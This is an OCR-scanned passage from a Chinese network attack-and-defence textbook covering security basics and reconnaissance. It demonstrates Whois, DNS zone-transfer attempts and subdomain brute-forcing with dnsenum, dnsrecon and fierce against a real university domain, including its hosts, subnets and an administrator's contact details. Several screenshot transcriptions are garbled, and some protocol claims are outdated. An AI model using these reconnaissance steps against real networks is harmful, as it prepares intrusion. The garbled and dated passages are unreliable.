网 络 安全 的 五 个 基本 目标 是 保密 性 完整 性 、 不 可 抵赖 性 (不 可 否认 )、 可 用 性 和 可 控 
性 ,面临 的 主要 威胁 包括 恶意 代码 、 远 程 人 侵 ( 攻 击 )、 拒 绝 服务 攻击 、 身 份 假冒 、 信 息 窃取 
和 算 改 等 。 网 络 安全 的 研究 内 容 包 括 网 络 安全 体系 、 网 络 攻 击 技 术 、 网 络 防御 技术 、 密 码 
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技术 和 网 络 安 全 应 用 技术 等 。 网 络 安全 体系 按 层次 划分 为 物理 层 安 全 、 系 统 层 安 全 、 网 络 
层 安 全 、 应 用 层 安 全 和 管理 层 安全 。 

网 络 攻 击 的 方式 分 为 读 取 攻击 、 操 作 攻 击 、 欺 骗 攻 击 、 泛 洪 攻 击 、 重 定向 攻击 和 
Rootkits 技术 等 ,常用 手段 包括 网 络 监听 、 自 改 数据 、 网 络 欺 骗 . 弱 口 令 攻 击 、 拒 绝 服 务 攻 
击 ` 漏 洞 破解 和 木马 攻击 等 ,攻击 过 程 分 为 信息 收集 .网 络 隐身 .端口 和 漏洞 扫描 、 攻 击 实 
施 、. 设 置 后 门 和 清除 痕迹 等 步骤 。 

网 络 防御 技术 有 信息 加 密 、 访 问 控制 .防火 墙 人 侵 防御 .恶意 代码 防范 和 安全 审计 与 
查证 等 ,其 中 : 

(1) 访问 控制 基于 身份 认证 ,身份 认证 包括 身份 识别 和 验证 。 

(2) 常见 访问 控制 技术 包括 自主 访问 控制 强制 访问 控制 和 基于 角色 的 访问 控制 。 

(3) 防火 墙 的 功能 包括 服务 控制 ,方向 控制 ,用户 控制 和 行为 控制 。 

(4) 入侵 防御 系统 包括 事件 生成 器 .事件 分 析 器 .响应 单元 和 事件 数据 库 。 

(5) 恶意 代码 的 破坏 机 制 分 为 人 侵 系 统 、 维 持 或 提升 权限 .隐身 潜伏、 破坏 等 。 

(6) 安全 审计 主要 包括 操作 系统 审计 、 应 用 程序 审计 、 网 络 设备 审计 和 安全 应 用 审计 
与 查证 等 。 

密码 学 包括 对 称 密 码 和 公 钥 密码 两 种 体制 ,有 编码 学 和 密码 分 析 学 两 个 方向 。 加 密 
算法 有 对 称 加 密 算法 、 公 钥 加 密 算法 和 散 列 算法 等 。 密 码 分 析 类 型 有 唯 密 文 攻击 ,已 知 明 
文 攻击 、 选 择 明文 攻击 、 选 择 密 文 攻击 和 自 适应 选择 明文 攻击 等 。 

认证 技术 包括 消息 认证 码 、 安 全 散 列 函 数 和 数字 签名 等 。PKI 系统 包括 策略 、 认 证 机 
构 .注册 机 构 .证 书 /CRL 发 布 系统 和 PKI 应 用 接口 等 。 

在 常见 网 络 安全 应 用 中 : 

(1) 802. 1X 属于 链 路 层 认证 机 制 ,是 一 种 基于 端口 的 接 入 控制 协议 。 

(2) IPSec 是 一 种 端 到 端的 确保 IP 层 通 信安 全 的 机 制 , 它 是 一 组 协议 集 ,主要 包括 
AH、ESP 和 IKE 三 个 协议 。 

(3) 安全 套 接 层 (Secure Socket Layer,SSL) 协 议 是 一 种 在 应 用 层 协议 和 TIPC/IP 协 
议 之 间 提 供 数据 安全 性 的 机 制 , 目 前 版 本 是 SSLv3。 

(4) 虚拟 专用 网 (Virtual Private Network,VPN) 是 建立 在 公用 网 上 ,在 公 网 上 建立 
隧道 ,构成 由 某 个 组 织 或 某 些 用 户 专用 的 通信 网 络 。 

(5) 802. 11i 协议 是 无 线 局 域 网 的 安全 标准 ,执行 的 操作 称 为 Wi-Fi 网 络 安全 存 取 
(Wi-Fi Protected Access,WPA) 标 准 , 目 前 最 新 版 本 是 WPA2。 

(6) 安全 电子 交易 (Secure Electronic Transaction ,SET) 是 目前 唯一 实用 的 保证 信用 
卡 数据 安全 的 应 用 层 安全 协议 。 


习 题 
1-1 网 络 安全 的 五 个 基本 目标 是 什么 ? 它们 的 具体 含义 是 什么 ? 


1-2 ”网络 系 统 面临 的 主要 安全 威胁 有 哪儿 类 ? 
1-3 简要 叙述 网 络 安全 体系 中 各 个 层次 的 安全 目标 。 
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1-4 网 络 攻击 技术 分 为 哪 几 个 阶段 ? 各 阶段 的 作用 是 什么 ? 

1-5 网 络 防御 技术 包含 哪些 方面 ? 

1-6 密码 学 有 哪些 体制 ? 加 密 算法 有 哪 几 类? 代表 性 算法 分 别 有 哪 些 ? 密码 分 析 
有 哪些 类 型 ? 

1-7 认证 技术 有 哪 几 种 ? 

1-8 简要 叙述 网 络 安全 应 用 802. 1X、802. 11i\SET、SSL IPSec、VPN 的 作用 。 


女生 2 音 


信息 收集 


学 习 要 求 : 

。 掌握 Whois 查询 的 定义 和 方法 。 

。 掌握 常用 的 域名 和 IP 信息 收集 方法 。 

。 掌握 Web 挖 握 分 析 的 内 容 和 方法 。 

。 理解 使 用 社会 工程 学 方法 收集 信息 的 基本 原理 。 

。 掌握 拓扑 确定 的 基本 原理 ,熟悉 相应 工具 的 使 用 方法 。 

。 掌握 网 络 监听 技术 的 基本 原理 ,熟悉 各 种 监听 工具 的 使 用 方法 。 


信息 收集 也 称 为 网 络 踩点 (Footprinting) , 指 攻击 者 通过 各 种 途径 对 要 攻击 的 目标 进 
行 有 计划 和 有 步骤 的 信息 收集 ,从 而 了 解 目标 的 网 络 环境 和 信息 安全 状况 的 过 程 。 对 于 
目标 网 络 ,要 获取 的 信息 包括 域名 IP 地 址 .DNS 服务 器 、 邮 件 服务 器 、 网 络 拓扑 结构 等 ; 
对 于 目标 个 人 ,可 以 收集 他 的 身份 信息 、 联 系 方式 .职业 或 其 他 隐私 信息 等 。 掌 握 这 些 信 
息 后 ,攻击 者 就 可 以 利用 端口 和 漏洞 扫描 技术 收集 更 多 信息 ,为 实施 攻击 做 好 准备 。 此 阶 
段 获取 的 都 是 已 经 公开 的 信息 ,采用 的 都 是 合法 技术 。 常 见 的 踩点 方法 包括 注册 机 构 
Whois 查询 .DNS 和 IP 信息 收集 、Web 信息 搜索 与 挖掘 、 网 络 拓扑 侦察 、 网 络 监听 等 。 踩 
点 可 分 为 外 围 踩点 和 内 部 踩点 ,内 部 踩点 可 以 通过 网 络 监听 来 收集 用 户口 令 等 重要 信息 。 


2.1 Whois 查询 


Whois 查询 指 查 询 某 个 IP 或 域名 是 否 已 注册 ,以 及 注册 时 的 详细 信息 。 它 可 以 查询 
IP 或 域名 的 归属 者 ,包括 其 联系 方式 、 注 册 和 到 期 时 间 等 。DNS 和 IP 是 Internet 赖 以 运 
行 的 基础 设施 ,需要 公开 对 外 发 布 ,并 在 公共 数据 库 中 进行 维护 和 查询 ,主要 由 ICANN 
(Internet Corporation for Assigned Names and Numbers) 采 用 层次 化 方式 统一 管理 。 
Whois 查询 包括 DNS Whois 和 IP Whois 查询 。 


2.1.1 DNS Whois 查询 

域名 可 以 通过 一 批 相互 竞争 的 公司 来 注册 ,这 些 公司 又 称 “注册 商 ”, 由 ICANN 授 
权 。 当 组 织 或 个 人 申请 域名 时 ,他 选择 的 注册 商 将 向 他 询问 各 种 构成 注册 所 需 的 联络 信 
息 和 技术 信息 。 注 册 商 将 保存 这 些 联 络 信息 ,并 将 技术 信息 提交 给 一 个 中 央 目 录 库 ,又 称 
“注册 局 ”。 注 册 局 是 在 每 个 顶级 域名 下 注册 的 域名 的 权威 主 数据 库 。 注 册 局 运营 商 维护 
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该 主 数据 库 , 并 生成 “区 域 文件 ”, 使 得 计算 机 能 够 在 全 世界 的 任何 角落 访问 项 级 域名 ,用 
户 不 与 注册 局 运营 商 直 接 接触 。 

用 户 以 注册 人 身份 申请 ,通过 商业 运营 的 注册 商 查 询 和 挑选 未 被 使 用 的 域名 ,由 注册 
商 向 官方 注册 局 申请 分 配 ,并 向 注册 人 提供 DNS 域名 服务 。 域 名 注册 信息 包括 官方 注册 
局 、 注 册 商 和 注册 人 详细 信息 ,它们 存储 在 官方 注册 局 或 注册 商 所 维护 的 数据 库 中 。 因 
此 ,只 要 按照 ICANN 层次 关系 找 出 维护 具体 注册 信息 机 构 的 数据 库 , 即 可 获取 详细 的 注 
册 信 息 ?。 

国内 提供 Whois 查询 服务 的 站 点 主要 有 : 

(1) 站 长 之 家 : http://whois. chinaz. com 

(2) 中 国 万 网 : http://whois. aliyun. com 

(3) 美 橙 互 连 : http://whois. cndns. com 

(4) 爱 站 网 : http://whois. aizhan. com 

国外 提供 Whois 查询 服务 的 站 点 有 : 

(1) http://www. whois. com 

(2) http://www. register. com/whois. rcmx 

例如 从 “中 国 万 网 ”和 “站 长 之 家 ”分 别 查 询 新 浪 域名 “sina. com. cn” 的 Whois 注册 信 
息 , 结 果 如 图 2-1 所 示 。 查 询 结果 主 要 包括 : 

(1) 域名 所 有 者 (或 联系 人 ) 名 称 : 北京 新 浪 互 联 信息 服务 有 限 公司 

(2) 联系 方式 : domain@staff. sina. com. cn 

(3) 注册 商 名 称 : 北京 新 网 数码 信息 技术 有 限 公司 

(4) 注册 日 期 : 1998-11-20 

(5) 到 期 日 期 : 2019-12-04 

(6) 域名 服务 器 : nsl. sina. com. cn,ns2. sina. com. cn ,... 











I 








人 EE 


北京 新 闻 政 码 信息 技术 有 限 公司 


联系 人 ”北京 新 浪 互 联 信息 服务 有 限 公司 whols 反 吉 ] 
联系 方 区 。 。 domainname@staft sina.com.cn [whois 反 查 ] 
a 。。 2016e11 月 10 晶 
om 创建 9 间 。。 1998eF11 月 20 日 
Sd 这 med 问 。。 2019sF12 月 04 日 
ope ween naunaenas 上 务 骂 。。 whoiscnolniccom 
Ee 
DNS nslsinacomen 
Ooms i 状态 襄 户 油 设 置 东 止 测 闪 (dlientDeleteProhibited) 


域 各 服务 商 设 置 禁 止 删 给 (serverDeleteProhibited) 








2-1 新 浪 网 Whois 查询 结果 


@ 目前 从 公开 的 Whois 数据 库 中 无 法 查询 教育 网 域名 信息 , 即 edu. cn 后 组 无 法 查询 。 
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“站 长 之 家 ”网 站 还 支持 Whois 反 查 , 即 可 以 通过 邮件 地 址 和 所 有 人 名 称 反 向 查询 以 
该 地 址 或 名 称 申请 的 所 有 域名 信息 ,如 可 以 反 查 “北京 新 浪 互 联 信 息 服务 有 限 公司 ”注册 
了 哪些 域名 地 址 ,结果 如 图 2-2 所 示 。 


whois 查 词 。。 妆 箱 反 查 注 戎 人 反 查 。。 城 名 批 县 反 杰 。。 城 各 代 娩 Md 


一 
北京 新 浪 互 联 信息 服务 有 限 公司 二 
Tg8gen 北京 新 六 互联 售 四 村 务 有 限 公司 Somanname@statt snacomen 20111129 2017-1129 oO 
ca i 北新 联合 联 务 和 有 限 公 司 hungOstaff sacomen 2004-09:15 。 2016-09-15 [0] 
ctwscomen 北新 六 所 联 信息 爱 务 有限 公司 shuingOstatt snacomen 2004.09-15 。 2017.09.15 0O 


图 2-2 ”Whois 反 查 结果 
2.1.2 IP Whois 查询 


IP Whois 查询 指 通 过 IP Whois 来 查询 IP 地 址 的 详细 信息 ,如 IP 地址 的 用 户 以 及 用 
户 的 相关 信息 等 。IP 事务 由 ICANN 的 地 址 管理 组 织 ASO (Address Supporting 
Organization) 负 责 ,协调 各 个 区 域 Internet 注册 局 (Regional Internet Registry, RIR) 和 国 
家 Internet 注册 局 (National Internet Registry, NIR) 进 行 维护 ,各 个 具体 IP 地 址 网 段 保 
存在 各 RIR 或 NIR 的 数据 库 中 ,每 个 RIR 知道 每 段 IP 地 址 属于 谁 管辖 ,因此 只 需 选 择 
一 家 RIR 的 Whois 服务 器 作为 IP 信息 的 查询 点 , 即 可 找到 详细 的 注册 信息 。 许 多 网 站 
都 提供 了 IP Whois 查询 工具 ,很 容易 查 到 每 个 IP 地 址 所 属 网 络 、 所 在 国家 管理 员 及 具 
体 联系 方式 等 。 

国内 的 IP Whois 网 站 主要 有 : 
(1) 站 长 之 家 : http://ip. chinaz. com 
(2) 全 球 WHOIS 查询 : http://www. whois365. com/cn 
例如 ,从 “全 球 WHOIS 查询 ”网 站 分 别 查 询 江 西 师范 大 学 网 站 首页 的 IP 地 址 “202. 
.194.153” 的 Whois 信息 ,结果 如 图 2-3 所 示 。 其 中 包含 : 
(1) 所 属 注册 局 (Source): APNIC 
(2) 所 属 网 段 (inetnum): 202. 101. 194. 128-202. 101. 194. 191 
(3) 所 属国 家 (country): 中 国 (cn) 
(4) 具体 信息 (descr) : 南昌 ,江西 ,中 国 东 部 区 域 
(5) 管理 员 (person): Wanshu Zhou 
以 及 管理 员 的 具体 联系 方式 、IP 地 址 的 一 些 状态 信息 和 更 新 信息 等 。 

有 时 不 需要 查询 详细 的 Whois 信息 , 仅 需 要 知道 了 PP 地址 所 属 具体 地 理 位 置 ( 又 称 
IP2Location) , 则 可 以 查询 网 站 “ip. cn”, 该 网 站 专用 于 查询 全 或 DNS 的 具体 地 理 位 置 ， 
如 查询 “www. jxnu. edu. cn? 或 “202. 101. 194. 153” 的 地 理 位 置 ,结果 如 图 2-4 所 示 。 

有 时 通过 IP 反 查 域名 信息 (IP2Domain) 也 非常 有 用 .因为 一 台 物 理 主机 上 可 能 运行 
多 个 虚拟 主机 ,这 些 虚拟 主机 有 不 同 的 域名 ,但 通常 共用 一 个 IP 地 址 。 如 果 能 知道 哪些 
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cn/ip/202.101.194.153 








注册 局 WHOIS 主机 : whois.apnic.net 


% [whois.apnic .net 
% Whois data copyright terms http-//www.apnic .neVdb/dbcopyright html 


% Information related to '202.101.194.128 - 202.101.194.191" 


inetnum: 202 101.194.128 - 202.101 194 191 
netname: NC-EASTCNGEOGRA-SCHOOL 

descr nanchang city jiangxi province.geology graduate school of east china area 
country: CN 

admin-c: XY 1-AP 

tech-c: WZ1-CN 

mnt-by: MAINT-IP-WWF 

changed: lintx(!)publict.nc jx cn 20001219 

status: ASSIGNED NON-PORTABLE 

source: APNIC 

changed: hm-changed(Dapnic-net 20020827 


person: wanshu Zhou 
address: Data Communication Bureau MPT 
address: 40 Xueyuan Rd 

address: Beijing China 100083 

country: CN 

phone: +86-10-205-3992 

fax-no: +86-10-205-3994 

e-mail: zhouws(!)public.bta.net cn 

nic-hatr WZ1-CN 

notify- zhouws(!)public bta net cn 

notify: zhang(!)usal.aslaintfo.com 

mnt-by: MAINT-NULL 

changed: zhang(Dusaiasiainfo.com 19960115 
source: APNIC 

changed. hm-changed(Dapnic net 20111122 


图 2-3 IP Whois 查询 结果 








6 CN 





手机 、 电 话 号 码 当 y 据 库 DNS 1P 歼 4 胡 


www.jxnu.edu.cn 





您 查询 的 IP: 2892.1e1.194.153 
所 在 地 理 位 置 : 江西 省 南昌 市 电信 

GeolP: Nanchang. Jiangxi. China 

nanchang city .jiangxi province.geology graduate s 


2-4 IP 或 域名 地 理 位 置 查询 结果 


网 站 共用 一 台 主 机 ,就 可 能 通过 此 主机 上 其 他 网 站 的 漏洞 获得 主机 控制 权 ,这 种 技术 称 为 
“ 旁 注 ”"。 此 类 网 站 主要 有 : 

(1) 爱 站 网 : http://dns. aizhan. com 

(2) 站 长 之 家 : http://s. tool. chinaz. com/same 

从 “站 长 之 家 ”访问 IP“202. 101. 194.153” 所 对 应 的 域名 ,结果 如 图 2-5 所 示 , 可 以 发 
现 该 I 地址 上 运行 了 江西 师范 大 学 的 多 个 网 站 ,如 “chem. jxnu. edu. cn” 对 应 化 工学 院 、 
“tw. jxnu. edu. cn” 对 应 团委 等 。 
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当前 位 置 : 站 长 工具 > 同 jp 网 站 查询 


JP 查询 了 批量 查 词 了 所 在 地 批量 查 词 同 Ip 网 站 查询 瑟 WHOIS 坦 司 友情 链接 同 [P 检 测 











人 地 址 : 202.101.194.153 [江西 省 南昌 市 电信 ] 


| chemjxnu.edu.cn 江西 师范 大 学 化 学 化 工学 院 

2 newsjxnu.edu.cn 江西 师范 大 学 新 闻 网 

3 soyjxnu.edu.cn 江西 师范 大 学 数学 与 信息 科学 学 院 
4 jxfzyjyjxnueducn 江西 师范 大 学 江西 色 济 发 展 研究 院 
5 twjunueducn 国 委 

6 nanolabjxnueducn 江西 表 橙 纳 村 科 与 仿 感 工程 立 验 室 


图 2-5 IP2Domain 查询 结果 


2.2 域名 和 IP 信息 收集 


2.2.1 域名 信息 收集 


除了 域名 的 Whois 基本 信息 外 ,还 可 以 继续 收集 有 关 该 域名 的 其 他 详细 信息 ,包括 
有 关子 域名 . 子 域名 服务 器 、 域 内 的 主机 名 与 IP 的 映射 关系 、 邮 件 服务 器 地 址 DNS 记录 
信息 等 ,从 而 收集 目标 网 络 中 的 重要 主机 信息 。 这 些 信息 一 般 存储 在 该 域名 所 在 DNS 服 
务 器 上 ,可 以 通过 DNS 分 析 工 具 收 集 。 例 如 ,可 以 通过 域名 “sina. com. cn” 的 Whois 查询 
记录 发 现 ,登记 的 DNS 服务 器 包括 “nsl. sina. com. cn”( 图 2-1) ,那么 可 以 继续 分 析 该 服 
务 器 ,收集 有 关 域 名 的 记录 信息 等 。 常 见 的 资源 记录 类 型 如 表 2-1 所 列 。 


表 2-1 常见 DNS 资源 记录 





























类 型 说 明 
1 SOA 域 的 权威 记录 
2 NS 域 的 域名 服务 器 记录 
3 A 主机 IPv4 地 址 记录 
4 MX 邮件 服务 器 地 址 记录 
5 PTR 地 址 反 向 解析 记录 
6 AAAA 主机 IPv6 地 址 记录 
7 CNAME 主机 别名 记录 





常见 DNS 信息 的 分 析 和 收集 工具 可 以 分 为 以 下 几 类 : 

1. 域名 信息 查询 

此 类 工具 收集 在 服务 器 上 存储 的 指定 域名 的 区 域 文件 中 登记 的 有 关 记 录 , 如 host、 
dig 工具 。 相 对 于 host 命令 ,dig 命令 更 加 灵活 ,并 且 具 有 更 清晰 的 显示 信息 。 表 2-2 列 


€D/ 


网 络 攻防 技术 与 实战 





深入 理解 信息 安全 防护 体系 














出 了 经 常 使 用 的 命令 格式 ,以 “jxnu. edu. cn” 为 例 。 








表 2-2 常用 命令 格式 





host -a jxnu. 


dig jxnu. edu. cn [@dns_server] any 


edu. cn [dns server] 列 出 域 的 所 有 详细 信息 (不 包括 主机 记录 ) 





host www. jxnu. edu. cn [dns server] 
dig www. jxnu. edu. cn [@dns_server] 


显示 主机 A.CNAME 记录 





host -t mx jxnu. edu. cn [dns server] 仅 列 出 域 的 邮件 服务 器 记录 


dig jxnu. edu. cn [@dns_server] mx 





host -t ns jxnu. edu. cn[ dns server] 











dig jxnu. edu. cn [@dns_server] ns 列 出 域 的 权威 域名 服务 器 记录 

dig jxnu. edu. cn 十 nssearch 

host -1 jxnu. edu. cn[dns server] 列 出 域 中 的 所 有 主机 A 和 CNAME 记录 

i i 列 出 查询 该 域 所 接收 的 所 有 DNS 应 答 信息 , 包 含 
从 根 服务 器 到 dns2. jxnu. edu. cn 的 路 径 

dig jxnu. edu. cn afxr 查询 域 的 区 域 传输 记录 








host 命令 向 


颖 定 DNS 服务 器 发 起 标准 DNS 查询 请 求 ,查询 有 关 域 名 或 主机 的 信息 。 


图 2-6 显示 查询 域 的 详细 结果 ,可 发 现 该 域 的 域名 解析 服务 器 是 “dns2. jxnu. edu. cn”, 邮 件 


服务 器 是 “mail. jxnu. edu. cn” ,以 及 这 两 服务 器 的 IP 地 址 分 别 是 “219. 2 


229. 242. 10”。 如 


示 , 当 试图 查询 该 域 上 所 有 的 A 记录 时 ,请 


地 DNS 服务 器 上 


求 , 都 被 拒绝 。 因 此 收集 信 








29. 242. 63” 和 “219. 
1 果 域 的 DNS 服务 器 拒绝 查询 有 关 信 息 , 则 会 返回 失败 消息 ,如 图 2-7 所 
被 拒绝 。 该 例 进行 了 两 次 尝试 ,分 别 是 从 本 
:发 起 查询 请 求 和 从 指定 DNS 服务 器 “202. 101. 224. 69” 上 发 起 查询 请 
息 时 往往 需要 使 用 多 个 工具 进行 并 行 分 析 , 然 后 综合 分 析 结 果 














来 尽力 获取 目标 的 完 


dns2.jxnu.edu.c 
41 .jnu.edu, cn, 








图 2-6 域 的 详细 信息 
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.CN 
(REFUSED) 


-L jxnu.edu.cn 262.161.224.69 


jxnu.edu.cn not found: 5(REFUSED) 
faile: 





图 2-7 列 出 域 的 所 有 主机 


dig(Domain Information Grope, 域 信息 搜索 器 ) 命 令 执 行 DNS 搜索 ,显示 域名 服务 
器 返回 的 答复 。 它 提供 查询 选项 号 ,可 以 影响 搜索 方式 和 结果 显示 。 一 部 分 在 查询 请 求 
包头 配置 或 复位 标志 部 分 决定 显示 哪些 回复 信息 ,其 他 的 确定 超时 和 重 试 策略 。A 
个 查询 选项 由 带 前 级 (十 ) 的 关键 字 标 识 。 图 2-6 右边 显示 了 域 的 详细 信息 ,图 2-8 列 出 
了 域 “jxnu. edu. cn” 和 “baidu. com” 的 区 域 传输 查询 请 求 , 区 域 传输 操作 指 一 人 台 后 备 服 务 
器 使 用 来 自主 服务 器 的 数据 刷新 自己 的 区 域 数据 库 。 通 常 DNS 区 域 传送 操作 只 在 网 络 
中 确实 存在 后 备 域名 服务 器 时 才 有 必要 执行 ,但 许多 DNS 服务 器 却 被 错误 地 配置 成 只 要 
了 人 发 出 ,就 会 向 对 方 提供 一 个 区 域 数据 库 的 副本 ,此 时 内 部 主机 名 和 IP 地 址 都 暴 

露 给 了 攻击 者 ,可 以 看 到 图 2-8 中 ,两 个 域 的 回答 都 是 0 个 “Answer” 

















229.181.57.217 


的: 二 Sun War 的 23:65: 的 EST 2617 


IZE revd: 29 


>HEADER<<- opcode: QUERY, status: NXDONAIN, 4d; 57548 
Query tine: 32 ags: qr rd ra ad; QUERY: 1, ANSWER: 8, AUTHORITY: 8@, ADDITIONAL: © 
SERVER: 192,168.1,1#53(192.168.1.1) 


WHEN: Sun Har 的 23:06;87 EST 2917 QUESTION SECTION: 
MSG SIZE revd; 91 A ™ A 


ec 
:11942 和 .1 ssa(192.168.1.1) 
logs: qr rd Po od; OUERY: 1 9 A Sun Na :95 EST 2817 


QUESTION SECTION: 
wr 





图 2-8 区 域 传输 记录 查询 

2. 子 域名 枚 举 

在 得 到 主 域名 信息 之 后 ,如 果 能 通过 主 域名 得 到 所 有 子 域名 信息 ,再 通过 子 域名 查询 
其 对 应 的 主机 IP, 这 样 就 能 得 到 有 关 主 域 的 较 完整 。 枚 举 方法 通常 采用 指定 名 字 字 
典 进行 暴力 枚 举 的 方式 进行 .常用 工具 包括 : 

(1) dnsenum: 除了 获取 A 记录 、MX 记录 、NS 记录 、PTR 记录 外 ,还 可 以 根据 字典 
暴力 枚 举 子 域名 、 主 机 名 、C 段 网 络 扫描 和 反 向 网 络 查找 。 下 列 命令 为 利用 字典 dns. txt， 
递归 枚 举 域 中 出 现 的 所 有 子 域 以 及 子 域 中 的 主机 ,对 域 “jxnu. edu. cn 的 枚 举 结果 如 图 2-9 
所 示 ,命令 示例 如 下 : 











dnsenum [ —r] [ -ff /usr/share/dnsenum/dns.txt] 域 名 





Ne/ 网 络 攻防 技术 与 实战 一 一 深入 理解 信息 安全 防护 体系 





root@kali:~# dnsenum -r -f /usr/share/dnsenum/dns.txt jxnu.edu.cn 
dnsenum.pl VERSION:1.2.3 


-jxnu.edu.cn -一 
Host's addresses: WN 显示 主机 地 址 列表 ， 这 里 没有 找到 


Wildcard detection using: xirbqmlhndck 
人/ 随机 子 域 搜索 ， 都 指向 IP 61.131.208.210， 相 当 于 委派 给 了 该 IP 地 址 


xirbqmlhndck.jxnu.edu.cn., IN A 61.131.208.210 
Name Servers: 和 NS 服务 器 

dns2.jxnu.edu.cn. 522131 IN A 219.229.242.63 
Mail (MX) Servers: // 该 域 的 邮件 服务 器 

mailjxnu.edu.cn. 567092 IN A 219.229.242.10 


Trying Zone Transfers and getting Bind Versions: // 尝试 区 域 传输 ， 失 败 





Trying Zone Transfer for jxnu.edu.cn on dns2.jxnu.edu.cn ... 
AXFR record query failed: connection failed 


Brute forcing with /usr/share/dnsenum/dns.txt: // 字典 破解 ， 找 到 一 些 域名 





135,jxnu,edu.cn. 561808 IN A 202.101.194.153 
dns2.jxnu.edu.cn. 522070 ”IN A 219.229.242.63 
e@.jxnu.edu.cn. 536396 IN A 219.229.242.217 





Performing recursion: // 对 子 域 递归 查找 ， 但 是 没有 子 域 
---- Checking subdomains NS record 
Can't perform recursion no NS records. 





jxnu.edu.cn class C netranges: // 列 出 找到 的 IP 地 址 网 段 
202.101.194.0/24 
203.156.198.0/24 
219.229.240.0/24 
219.229.242.0/24 
219.229.250.0/24 


Performing reverse lookup on 1280 ip addresses: (0 站 面 5 个 网 段 的 所 有 地 址 反 向 解析 


130.194.101.202.in- addr.arpa. 604; PTR vpn.jxnu.edu.cn. 
soe。 // 省 略 了 很 多 未 显示 

2.240.229.219.in-addrarpa. 604800 |IN PTR portal.jxnu.edu.cn. 
2.250.229.219.in-addr.arpa. 604800 IN PTR rsc.jxnu.edu.cn. 

18.250.229.219,in-addrarpa. 604800 IN PTR jwc.jxnu.edu.cn. 


40 results out of 1280 IP addresses， // 找到 了 40 个 反 向 域名 
jxnu.edu.cn ip blocks: /找到 实际 存在 的 上 网 IP 地 址 块 


202.101.194.130/32 
202.101.194.148/31 
202.101.194.156/32 
219.229.250.2/31 
219.229.250.32/32 
219.229.250.102/31 
219.229.250.110/31 
219.229.250.131/32 
219.229.250.132/32 


done. 








图 2-9 dnsenum 工具 查询 示例 
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(2) dnsmap: 一 个 基于 C 的 小 工具 ,主要 基于 字典 暴力 获取 子 域名 ,其 自 带 一 个 字 
典 , 也 可 由 用 户 指明 字典 文件 。 示 例如 下 : 


dnsmap jxnu. edu. cn [ -w 字 典 文件 ][ -上 输出 文件 ] 


(3) dnsdict6 : 基于 dnsmap, 可 设置 线程 数 、 枚 举 IPv6 地 址 、 枚 举 MX 和 NS 记录 、 设 
置 字典 大 小 等 。 示 例如 下 : 


dnsdict6 -d -4[-x] [-+t 线 程 数 ] 目 标 域名 [字典 路 径 ] 


(4) dnsrecon: 功能 强大 的 域名 信息 收集 和 枚 举 工具 , 它 支持 : 

| 检查 域 传送 的 所 有 NS 记录 ; 

@ 枚 举 给 定 域 的 一 般 DNS 记录 (MX,SOA,NS,A,AAAA,SPF 和 TXT); 

@ 支持 通配符 ; 

@ 暴力 穷 举 给 定 域 的 子 域 及 主机 A 记录 和 AAAA 记录 ; 

@ 对 给 定 的 IP 范围 或 CIDR 执行 PTR 记录 查找 。 

图 2-10 列 出 了 对 域 5j xnu. edu. cn” 查 询 SRV 记录 和 标准 查询 的 结果 ,常用 命令 示例 
如 下 : 


dnsrecon -d 目标 域名 -D 字 典 文件 -t+t{std|brt|rvl|axfr|srv} 


:~# dnsrecon -d jxnu.edu.cn -t srv 
Enunerating Common SRM Records against jxnu.edu.cn 
No SRY Records Found for jxnu.edu.cn 
*] 9 Records Found 
:$ dnsrecon -d jxnu.edu.cn -t std 
Performing General Enumeration of Domain: 
Wildcard resolution is enabled on this domain 
It 1s resolving to 61.131.268.219 
ALL queries will resolve to this address!! 
DNSSEC is not configured for jxnu.edu.cn 
Could not Resolve SOA Record for jxnu.edu.cn 
NS dns2.jxnu.edu.cn 219.229.242.63 
Recursion enabled on NS Server 219.229.242.63 
Bitnd Verslon for 219.229.242.53 9.9.5-3ubuntu9.13-Ubuntu 
MX mail .jxnu.edu.cn 219.229.242.19 
Enumerating SRY Records 
No SRV Records Found for jxnu.edu.cn 
[*] © Records Found 





图 2-10 dnsrecon 工具 使 用 示例 


(5) dnstracer: 用 于 查询 特定 域名 所 对 应 的 域名 解析 服务 器 地 址 ,显示 本 地 缓存 所 
使 用 的 服务 器 ,并 跟踪 DNS 服务 器 查询 链 得 到 权威 结果 , 即 可 追踪 所 有 解析 目标 域名 的 
DNS 请 求 应 答 报 文 , 可 用 于 DNS 信息 诊断 ,也 可 以 用 于 判断 是 否 发 生 本 地 域名 劫持 。 命 
令 示 例如 下 : 





dnstracer -v -4[ 一 q {A|MX|NS}] 域 名 

(6) fierce: 综合 使 用 多 种 技术 扫描 目标 主机 IP 地 址 和 主机 名 的 枚 举 工 具 , 包 括 反 向 
查找 某 个 IP 地 址 段 中 的 域名 。 使 用 fierce 收集 域 “jxnu. edu. cn” 的 结果 如 图 2-11 所 示 ， 
常用 命令 示例 如 下 : 








fierce - dns 目标 域名 [ - dnsserver 指定 DNS] [ - range ip 地 址 范围 ] 
[ - threads 线程 数 ] [ - wordlist 字典 路 径 ] 














Ve 网 络 攻防 技术 与 实战 一 一 深入 理解 信息 安全 防护 体系 





root@kali:~# fierce -dns jxnu.edu.cn 
DNS Servers for jxnu.edu.cn: // 获取 解析 该 域 的 域名 服务 器 信息 


dns2.jxnu.edu.cn 


Trying zone transfer first... // 检测 是 否 可 以 区 域 传输 
Testing dns2.jxnu.edu.cn 
Request timed out or transfer not allowed. 


Unsuccessful in zone transfer (it was worth a shot) 
Okay, trying the good old fashioned way... brute force 


Checking for wildcard DNS... 

** Found 95265463271.jxnu.edu.cn at 61.131.208.210. 
** High probability of wildcard DNS. 

Now performing 2280 test(s)... WN 字典 攻击 
202.101.194.148 gqxqjs.jxnu.edu.cn 
202.101.194.135 graduate.jxnu.edu.cn 
219.229.240.12 red.jxnu.edu.cn 
省略 了 部 分 输出 未 显示 
219.229.240.7 rose.jxnu.edu.cn 

219.229.251.5 s.jxnu.edu.cn 

202.101.194.153 sl.jxnu.edu.cn 

219.229.242.10 smtp.jxnu.edu.cn 

202.101.194.153 tw.jxnu.edu.cn 

219.229.240.7 video.jxnu.edu.cn 

202.101.194.165 vpn.jxnu.edu.cn 

202.101.194.153 www.jxnu.edu.cn 


Subnets found (may want to probe here using nmap or unicornscan): // 找到 若干 子 网 
202.101.194.0-255 : 29 hostnames found. 

203.156.198.0-255 : 1 hostnames found. 

219.229.240.0-255 : 29 hostnames found， 

219.229.242.0-255 : 7 hostnames found. 

219.229.250.0-255 : 1 hostnames found. 

219.229.251.0-255 : 1 hostnames found. 


Done with Fierce scan: http://ha.ckers.org/fierce/ 
Found 68 entries. 


Have a nice day. 








